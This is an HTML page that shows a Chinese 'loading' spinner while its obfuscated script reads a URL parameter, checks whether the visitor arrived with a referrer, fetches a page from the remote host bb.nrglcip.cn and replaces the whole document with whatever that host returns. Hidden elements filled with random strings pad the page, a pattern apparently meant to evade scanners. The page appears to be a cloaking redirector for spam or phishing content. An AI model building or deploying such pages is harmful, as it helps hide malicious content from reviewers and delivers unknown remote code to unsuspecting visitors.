<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .kU1v4LRW3sh {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .kU1v4LRW3sh .TylkZzMWD {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .kU1v4LRW3sh .content {
            line-height: 50px;
            text-align: center
        }

        .kU1v4LRW3sh .img {
            width: 100%
        }

        .kU1v4LRW3sh .QANzUNS2 {
            text-align: center
        }

        .kU1v4LRW3sh .QANzUNS2 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .kU1v4LRW3sh .QANzUNS2 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .kU1v4LRW3sh .QANzUNS2 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .kU1v4LRW3sh .QANzUNS2 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .kU1v4LRW3sh .QANzUNS2 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .kU1v4LRW3sh .QANzUNS2 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .kU1v4LRW3sh .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function VNstCwKEullf(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var BqUYb = VNstCwKEullf('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ BqUYb +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ BqUYb +".html?a=share";
		}
		
        kDlsfPfx=url+"#"+new Date().getTime();
        kDlsfPfx && function() {
            $.get(kDlsfPfx, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >LW5K8MHEYN6DZUo6Oy5HFI9nN0wkYI3xzIRf6BrcMCy4u8XTSxn0sqZ</li>
<a  href='#' style='display:none'>vEhzcXSN2kevCgJ5QuR3ZVAskK9N</a>
<ul style='display:none' >GvICqnjN1BdhnekcPUXbsTylrN9HKi58EXfjyT3Md9z79JTvk</ul>
<ul style='display:none' >GvICqnjN1BdhnekcPUXbsTylrN9HKi58EXfjyT3Md9z79JTvk</ul>
<p  style='display:none'>sajdpFDV53Y46oAOJaWQyU9aZtneTw1KPsWsUq09XwFs4cBExxZaden1JXwDUccIQe6JOpi3F8YppP74OqvZJQSK4iT</p>
<span style='display:none'>bE5eCqBUL1nV5JTnvgSafJHcD9Vg6R61zGWLgywUxLz96XwdA5xqhQ8Y9JBulu</span><div class="kU1v4LRW3sh">
    <div class="TylkZzMWD">
        <div class="QANzUNS2">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<span style='display:none'>qw7ZGGUCby2VXvlha</span>
<ul style='display:none' >DosNfCYSM0F93arRIyAC5LpHuB2rVxADoAPvMLTUrJMtr4iuIBrLplXFOZw3ZOUpZyZ0VOfbgrlhlo</ul>
<a  href='#' style='display:none'>bHtLCSa8z4L0le8lCl0ejCw4593xXlqTk6mOlabeilrr3SXNxZTjSwXcFuktGsiaTqmCgR63kL9cmM2X2YTrk</a>
<li style='display:none' >sZDN7yGSCBpEPZhn9QpNiMNdeBx621AKYrhtrY3rIj9</li>
<ul style='display:none' >DosNfCYSM0F93arRIyAC5LpHuB2rVxADoAPvMLTUrJMtr4iuIBrLplXFOZw3ZOUpZyZ0VOfbgrlhlo</ul>
<img  src='' style='display:none'>
<li style='display:none' >sZDN7yGSCBpEPZhn9QpNiMNdeBx621AKYrhtrY3rIj9</li>
<b style='display:none' >NRuysCqI8NQJd1hueBgOAxcM5C4HcyBky3NgfjDpsyh6VmI0UECiy9NHSxsaac</b>
<ul style='display:none' >DosNfCYSM0F93arRIyAC5LpHuB2rVxADoAPvMLTUrJMtr4iuIBrLplXFOZw3ZOUpZyZ0VOfbgrlhlo</ul></body>
</html>